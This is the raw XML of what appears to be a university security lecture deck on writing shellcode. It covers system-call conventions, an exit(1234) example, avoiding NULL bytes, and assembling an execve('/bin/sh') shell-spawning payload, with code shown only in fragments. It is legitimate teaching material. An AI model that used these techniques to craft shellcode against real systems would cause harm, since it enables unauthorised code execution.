        <p:spPr>
          <a:xfrm>
            <a:off x="1245704" y="4982817"/>
            <a:ext cx="3551582" cy="1194146"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 110019"/>
              <a:gd name="adj2" fmla="val -71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execve() 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is a dynamically linked function, i.e., it introduces external dependency</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31107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127D-FC16-304C-A3A0-BCFE610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26A2-182B-0F4F-B9A2-68DC2FBB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write shellcode in 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17996-9940-0545-8E07-C9FD3ED48074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041202" y="2867913"/>
            <a:ext cx="4303643" cy="1477328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"/bin/sh"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argv[]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{sh,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execve(sh, argv,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B23E48-D005-4B49-A318-B82663C6F0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44845" y="3606577"/>
            <a:ext cx="113546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4051ED-11C2-CE4B-A3F1-C052B08477FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5424357" y="2744213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Static</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Compile</a:t>
            </a:r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72786D-03DC-FD47-AAD9-C7BDF9EA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3" y="2467395"/>
            <a:ext cx="5113613" cy="3755692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7D4F3E56-0413-B442-A65A-D05F79B3A627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4982817"/>
            <a:ext cx="3959086" cy="1194146"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 110019"/>
              <a:gd name="adj2" fmla="val -71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- Too large: 826KB (in my machine)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- Code has a lot of prohibited characters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(e.g., NULL byte )</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9871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6E1E-3F13-6B4E-8EBD-CF3EA08A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5926-927D-4C40-8DA9-584F2D4B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write shellcode in assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No dependency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Small size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid prohibited characters (e.g., NULL byte)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229969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EAA9-6152-BA4C-9651-99B75A42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875A-B165-0545-B288-3D27E266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Shellcode invokes a system call to change a system state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., execute a program, open/read a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ref: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md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System call calling convention (x86)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System call number: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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arguments: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ebx, ecx, edx, esi, edi, ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invoke: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0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return: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</a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90638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5552-DFD3-AD41-B525-09BD6B98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731E-C259-A84D-9FF7-11F817E2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 calling convention (x86-64)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System call number: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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arguments: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rdi, rsi, rdx, r10, r8, r9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invoke: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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return: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</a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167295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84B5-B408-C846-B59C-D95349D0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exit(1234) shellcode (x86)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C47F5-F9D9-574B-8B11-F408B1ABBC4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4323786" y="1718623"/>
            <a:ext cx="32175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.intel_syntax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noprefix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7D90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@function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7D902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A0A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SYS_exit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0x80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41259E5-6A72-BE4A-A88C-3A6947459062}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8136255" y="1559951"/>
            <a:ext cx="3707875" cy="1021208"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -64850"/>
              <a:gd name="adj2" fmla="val -169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Specify intel syntax</a:t>
            </a:r>
            <a:b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(NOTE: gcc’s default syntax is AT&amp;T)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191F607-B0AC-3D4C-B9CC-7BEB637FD2C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="3217547" cy="1021208"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 58971"/>
              <a:gd name="adj2" fmla="val 3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Specify .text section in an ELF file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BB44696D-16D1-D44B-B2FD-D1E2A10C2A29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2918396"/>
            <a:ext cx="3217547" cy="1021208"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 57736"/>
              <a:gd name="adj2" fmla="val -468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Declare a global symbol named ‘main’ and its type is function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(for linking)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F827DED-E483-0846-8ADA-97722DB4D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9" y="4787445"/>
            <a:ext cx="10363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1561</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>261</Paragraphs>
  <Slides>23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Shellcode</vt:lpstr>
      <vt:lpstr>Objectives</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>How to write shellcode</vt:lpstr>
      <vt:lpstr>How to write shellcode</vt:lpstr>
      <vt:lpstr>How to write shellcode</vt:lpstr>
      <vt:lpstr>System call</vt:lpstr>
      <vt:lpstr>System call</vt:lpstr>
      <vt:lpstr>Example: exit(1234) shellcode (x86)</vt:lpstr>
      <vt:lpstr>Convert assembly into shellcode bytes</vt:lpstr>
      <vt:lpstr>Testing your shellcode</vt:lpstr>
      <vt:lpstr>Example: exit(1234) shellcode (x86-64)</vt:lpstr>
      <vt:lpstr>Our shellcode contains NULL byte</vt:lpstr>
      <vt:lpstr>Let’s make more complicated shellcode</vt:lpstr>
      <vt:lpstr>Make a string (“/bin/sh”) in shellcode</vt:lpstr>
      <vt:lpstr>Make a string (“/bin/sh”) in shellcode</vt:lpstr>
      <vt:lpstr>Make a string (“/bin/sh”) in shellcode</vt:lpstr>
      <vt:lpstr>Make an array ([”/bin/sh”, NULL]) in shellcode</vt:lpstr>
      <vt:lpstr>Put them all together</vt:lpstr>
      <vt:lpstr>More restriction: Printable shellcode</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Solution: Decoding shellcode</vt:lpstr>
      <vt:lpstr>Remaining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insu</cp:lastModifiedBy>
  <cp:revision>840</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-11T13:07:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-11T09:07:54Z</dcterms:modified>
</cp:coreProperties>
</file>